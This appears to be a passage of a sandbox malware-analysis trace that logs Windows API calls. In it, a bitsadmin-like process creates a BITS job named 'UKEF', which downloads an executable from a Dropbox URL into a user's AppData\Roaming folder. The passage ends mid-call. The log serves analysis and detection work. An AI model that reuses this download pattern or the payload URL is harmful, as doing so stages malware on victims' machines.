0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 689 start_va = 0x2300000 end_va = 0x237ffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 690 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 691 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 692 start_va = 0x7fef5020000 end_va = 0x7fef502efff entry_point = 0x7fef5020000 region_type = mapped_file name = "qmgrprxy.dll" filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll") Region: id = 990 start_va = 0x23c0000 end_va = 0x243ffff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 991 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Thread: id = 23 os_tid = 0xa94 [0022.841] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efc50 | out: lpSystemTimeAsFileTime=0x1efc50*(dwLowDateTime=0xa70ca060, dwHighDateTime=0x1d38a00)) [0022.841] GetCurrentProcessId () returned 0xa90 [0022.841] GetCurrentThreadId () returned 0xa94 [0022.841] GetTickCount () returned 0x15b39 [0022.841] QueryPerformanceCounter (in: lpPerformanceCount=0x1efc58 | out: lpPerformanceCount=0x1efc58*=340610061) returned 1 [0022.842] GetModuleHandleW (lpModuleName=0x0) returned 0xff2a0000 [0022.842] __set_app_type (_Type=0x1) [0022.842] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff2d0a14) returned 0x0 [0022.842] __wgetmainargs (in: _Argc=0xff2d7710, _Argv=0xff2d7720, _Env=0xff2d7718, _DoWildCard=0, _StartInfo=0xff2d772c | out: _Argc=0xff2d7710, _Argv=0xff2d7720, _Env=0xff2d7718) returned 0 [0022.843] _onexit (_Func=0xff2d28c4) returned 0xff2d28c4 [0022.843] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0022.843] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0022.843] AitLogFeatureUsageByApp () returned 0x0 [0022.844] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018 [0022.844] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b [0022.844] VerifyVersionInfoW (in: lpVersionInformation=0x1efa80, dwTypeMask=0x3, dwlConditionMask=0x800000000000001b | out: lpVersionInformation=0x1efa80) returned 1 [0022.844] SetLastError (dwErrCode=0x0) [0022.844] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76f70000 [0022.844] GetProcAddress (hModule=0x76f70000, lpProcName="HeapSetInformation") returned 0x76f8c4a0 [0022.844] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0022.844] GetCurrentProcess () returned 0xffffffffffffffff [0022.844] GetCurrentThread () returned 0xfffffffffffffffe [0022.844] GetCurrentProcess () returned 0xffffffffffffffff [0022.844] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xff2d7f20, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xff2d7f20*=0x84) returned 1 [0022.845] SetConsoleCtrlHandler (HandlerRoutine=0xff2b9fe0, Add=1) returned 1 [0022.845] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76f70000 [0022.845] GetProcAddress (hModule=0x76f70000, lpProcName="SetThreadUILanguage") returned 0x76f86d40 [0022.845] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0022.845] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0022.848] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0022.848] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0022.848] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0022.848] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2 [0022.848] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3 [0022.848] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6 [0022.848] swprintf_s (in: _Dst=0x1efb80, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8 [0022.848] GetFileType (hFile=0x7) returned 0x2 [0022.848] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1efaa0 | out: lpMode=0x1efaa0) returned 1 [0022.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efb20, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1efb20*=0x2) returned 1 [0022.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x1efb20, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1efb20*=0x24) returned 1 [0022.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1efb20, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1efb20*=0x1e) returned 1 [0022.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x1efb20, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1efb20*=0x29) returned 1 [0022.850] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efb20, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1efb20*=0x2) returned 1 [0022.850] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x1efb20, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1efb20*=0x5e) returned 1 [0022.850] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x1efb20, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1efb20*=0x58) returned 1 [0022.850] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1efb20, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1efb20*=0x2) returned 1 [0022.850] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0022.983] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0022.983] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x1efb90 | out: lpNumberOfEvents=0x1efb90) returned 1 [0022.984] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0022.984] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xff2d7cf4 | out: lpMode=0xff2d7cf4) returned 1 [0022.984] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xff2d7cf8 | out: lpConsoleScreenBufferInfo=0xff2d7cf8) returned 1 [0022.985] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xff2d7cf0 | out: lpMode=0xff2d7cf0) returned 1 [0022.985] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0022.985] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12 [0022.985] _wcsicmp (_String1="/transfer", _String2="/?") returned 53 [0022.985] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1 [0022.985] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8 [0022.985] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7 [0022.985] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2 [0022.985] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0 [0022.986] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1 [0022.986] _wcsicmp (_String1="/download", _String2="/UPLOAD") returned -17 [0022.986] _wcsicmp (_String1="/download", _String2="/DOWNLOAD") returned 0 [0022.986] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5 [0022.986] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12 [0022.986] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0 [0022.986] _wcsicmp (_String1="normal", _String2="FOREGROUND") returned 8 [0022.986] _wcsicmp (_String1="normal", _String2="HIGH") returned 6 [0022.986] _wcsicmp (_String1="normal", _String2="NORMAL") returned 0 [0022.986] CoCreateInstance (in: rclsid=0xff2a2150*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0xff2a2140*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xff2e1f40 | out: ppv=0xff2e1f40*=0x263a08) returned 0x0 [0023.657] IBackgroundCopyManager:CreateJob (in: This=0x263a08, DisplayName="UKEF", Type=0x0, pJobId=0x1efb60, ppJob=0x1efac8 | out: pJobId=0x1efb60*(Data1=0xdfb62881, Data2=0x3bae, Data3=0x4023, Data4=([0]=0x84, [1]=0x6d, [2]=0xea, [3]=0x32, [4]=0xbd, [5]=0xcf, [6]=0xf5, [7]=0x1)), ppJob=0x1efac8*=0x263b58) returned 0x0 [0023.910] CoTaskMemAlloc (cb=0x68) returned 0x263c30 [0023.910] IUnknown:AddRef (This=0x263b58) returned 0x2 [0023.910] IUnknown:AddRef (This=0x263b58) returned 0x3 [0023.910] PeekMessageW (in: lpMsg=0x1efb30, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x1efb30) returned 0 [0023.910] IUnknown:Release (This=0x263b58) returned 0x2 [0023.910] IBackgroundCopyJob:SetPriority (This=0x263b58, Val=0x2) returned 0x0 [0023.910] IBackgroundCopyJob:AddFile (This=0x263b58, RemoteUrl="https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1", LocalName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe") returned 0x0 [0023.919] IBackgroundCopyJob:SetNotifyFlags (This=0x263b58, Val=0xb) returned 0x0 [0023.920] IBackgroundCopyJob:SetNotifyInterface (This=0x263b58, Val=0x263c30) returned 0x0 [0023.920] IUnknown:QueryInterface (in: This=0x263c30, riid=0x7fefe996f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ef290 | out: ppvObject=0x1ef290*=0x0) returned 0x80004002 [0023.920] IUnknown:QueryInterface (in: This=0x263c30, riid=0x7fefe996f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ef178 | out: ppvObject=0x1ef178*=0x0) returned 0x80004002 [0023.920] IUnknown:QueryInterface (in: This=0x263c30, riid=0x7fefe9bd1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ef0f0 | out: ppvObject=0x1ef0f0*=0x0) returned 0x80004002 [0023.920] IUnknown:QueryInterface (in: This=0x263c30, riid=0x7fefe996ce0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ef080 | out: ppvObject=0x1ef080*=0x263c30) returned 0x0 [0023.921] IUnknown:AddRef (This=0x263c30) returned 0x3 [0023.921] IUnknown:QueryInterface (in: This=0x263c30, riid=0x7fefe9bd470*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1eef30 | out: ppvObject=0x1eef30*=0x0) returned 0x80004002 [0023.921] IUnknown:QueryInterface (in: This=0x263c30, riid=0x7fefe9bd480*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25e508 | out: ppvObject=0x25e508*=0x0) returned 0x80004002 [0023.921] IUnknown:QueryInterface (in: This=0x263c30, riid=0x7fefe9bd460*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x1eef28 | out: ppvObject=0x1eef28*=0x0) returned 0x80004002 [0023.921] IUnknown:Release (This=0x263c30) returned 0x2 [0023.924] IUnknown:QueryInterface (in: This=0x263c30, riid=0x2522d0*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x1edd28 | out: ppvObject=0x1edd28*=0x0) returned 0x80004002 [0023.924] IUnknown:QueryInterface (in: This=0x263c30, riid=0x2522d0*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x1edd28 | out: ppvObject=0x1edd28*=0x263c30) returned 0x0 [0023.925] IUnknown:QueryInterface (in: This=0x263c30, riid=0x2522d0*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x24f740 | out: ppvObject=0x24f740*=0x263c30) returned 0x0 [0023.927] IBackgroundCopyJob:Resume (This=0x263b58) returned 0x0 [0023.929] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0023.930] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0023.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1ef9d0 | out: lpMode=0x1ef9d0) returned 1 [0023.937] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a1) returned 1 [0023.937] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0023.938] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0023.938] TranslateMessage (lpMsg=0x1efa28) returned 0 [0023.938] DispatchMessageW (lpMsg=0x1efa28) returned 0x1 [0023.938] IUnknown:QueryInterface (in: This=0x263c30, riid=0x7fefe9bd8e0*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x1ef248 | out: ppvObject=0x1ef248*=0x0) returned 0x80004002 [0023.938] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0023.938] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0023.945] IBackgroundCopyJob:GetType (in: This=0x263b58, pVal=0x1eebc8 | out: pVal=0x1eebc8) returned 0x0 [0023.957] IBackgroundCopyJob:GetProgress (in: This=0x263b58, pVal=0x263c50 | out: pVal=0x263c50) returned 0x0 [0023.958] IBackgroundCopyJob:GetPriority (in: This=0x263b58, pVal=0x1eebd0 | out: pVal=0x1eebd0) returned 0x0 [0023.959] CoTaskMemFree (pv=0x0) [0023.959] IBackgroundCopyJob:GetDisplayName (in: This=0x263b58, pVal=0x1eebd8 | out: pVal=0x1eebd8*="UKEF") returned 0x0 [0023.960] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeb00 | out: lpConsoleScreenBufferInfo=0x1eeb00) returned 1 [0023.960] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1eeb38 | out: lpNumberOfCharsWritten=0x1eeb38) returned 1 [0023.961] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1eeb38 | out: lpNumberOfAttrsWritten=0x1eeb38) returned 1 [0023.961] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1 [0023.961] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0023.961] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.961] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0023.961] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0023.962] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.962] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0023.962] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0023.962] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.962] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x7) returned 1 [0023.962] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0023.962] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.963] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0023.963] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0023.963] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.963] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0023.963] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0023.963] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.964] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xc) returned 1 [0023.964] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0023.964] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.964] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0023.964] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0023.964] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.964] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x6) returned 1 [0023.965] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0023.965] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0023.965] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0023.965] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0023.965] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="1") returned 1 [0023.965] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0023.966] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0023.966] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0023.966] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0023.966] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0023.966] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0023.966] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eeb30 | out: lpSystemTimeAsFileTime=0x1eeb30*(dwLowDateTime=0xa7860680, dwHighDateTime=0x1d38a00)) [0023.966] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eeb30 | out: lpSystemTimeAsFileTime=0x1eeb30*(dwLowDateTime=0xa7860680, dwHighDateTime=0x1d38a00)) [0023.966] _finite (_X=0x1eeb30) returned 0 [0023.966] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0023.966] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xd) returned 1 [0023.967] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0023.967] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0023.967] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xf) returned 1 [0023.967] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0023.967] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1ee888 | out: _Buffer="0.00 B/S") returned 8 [0023.967] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeaf0 | out: lpConsoleScreenBufferInfo=0x1eeaf0) returned 1 [0023.967] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb30, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb30*=0x8) returned 1 [0023.968] CoTaskMemFree (pv=0x24d760) [0023.977] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0023.977] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0028.082] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0028.082] TranslateMessage (lpMsg=0x1efa28) returned 0 [0028.082] DispatchMessageW (lpMsg=0x1efa28) returned 0x1 [0028.082] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0028.082] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0028.107] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0028.107] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0028.108] IBackgroundCopyJob:GetType (in: This=0x263b58, pVal=0x1ed088 | out: pVal=0x1ed088) returned 0x0 [0028.109] IBackgroundCopyJob:GetProgress (in: This=0x263b58, pVal=0x263c50 | out: pVal=0x263c50) returned 0x0 [0028.110] IBackgroundCopyJob:GetPriority (in: This=0x263b58, pVal=0x1ed090 | out: pVal=0x1ed090) returned 0x0 [0028.111] CoTaskMemFree (pv=0x0) [0028.111] IBackgroundCopyJob:GetDisplayName (in: This=0x263b58, pVal=0x1ed098 | out: pVal=0x1ed098*="UKEF") returned 0x0 [0028.111] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ecfc0 | out: lpConsoleScreenBufferInfo=0x1ecfc0) returned 1 [0028.112] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1ecff8 | out: lpNumberOfCharsWritten=0x1ecff8) returned 1 [0028.112] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1ecff8 | out: lpNumberOfAttrsWritten=0x1ecff8) returned 1 [0028.112] SetConsoleCursorPosition (hConsoleOutput=0x7, 